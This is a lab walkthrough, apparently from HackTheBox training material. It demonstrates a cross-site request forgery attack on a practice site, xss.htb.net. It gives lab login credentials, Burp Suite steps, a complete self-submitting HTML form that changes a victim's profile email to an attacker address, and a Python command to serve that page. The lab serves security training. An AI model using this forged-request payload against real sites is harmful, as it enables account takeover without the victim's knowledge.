Cross-Site Request Forgery (CSRF or XSRF)
Navigate to http://xss.htb.net and log in to the application using the credentials below:
Email: crazygorilla983
Password: pisces
This is an account that we created to look at the functionality of the application.
Run Burp Suite as follows.
eldeim@htb[/htb]$ burpsuiteActivate burp suite's proxy (Intercept On) and configure your browser to go through it.
Now, click on "Save."
You should see the below.
We notice no anti-CSRF token in the update-profile request. Let's try executing a CSRF attack against our account (Ela Stienen) that will change her profile details by simply visiting another website (while logged in to the target application).
First, create and serve the below HTML page. Save it as notmalicious.html
<html>
<body>
<form id="submitMe" action="http://xss.htb.net/api/update-profile" method="POST">
<input type="hidden" name="email" value="attacker@htb.net" />
<input type="hidden" name="telephone" value="(227)-750-8112" />
<input type="hidden" name="country" value="CSRF_POC" />
<input type="submit" value="Submit request" />
</form>
<script>
document.getElementById("submitMe").submit()
</script>
</body>
</html>If you are wondering how we ended up with the above form, please see the image below.
We can serve the page above from our attacking machine as follows.
eldeim@htb[/htb]$ python -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...No need for a proxy at this time, so don't make your browser go through Burp Suite. Restore the browser's original proxy settings.
While still logged in as Ela Stienen, open a new tab and visit the page you are serving from your attacking machine http://<VPN/TUN Adapter IP>:1337/notmalicious.html. You will notice that Ela Stienen's profile details will change to the ones we specified in the HTML page we are serving.
Last updated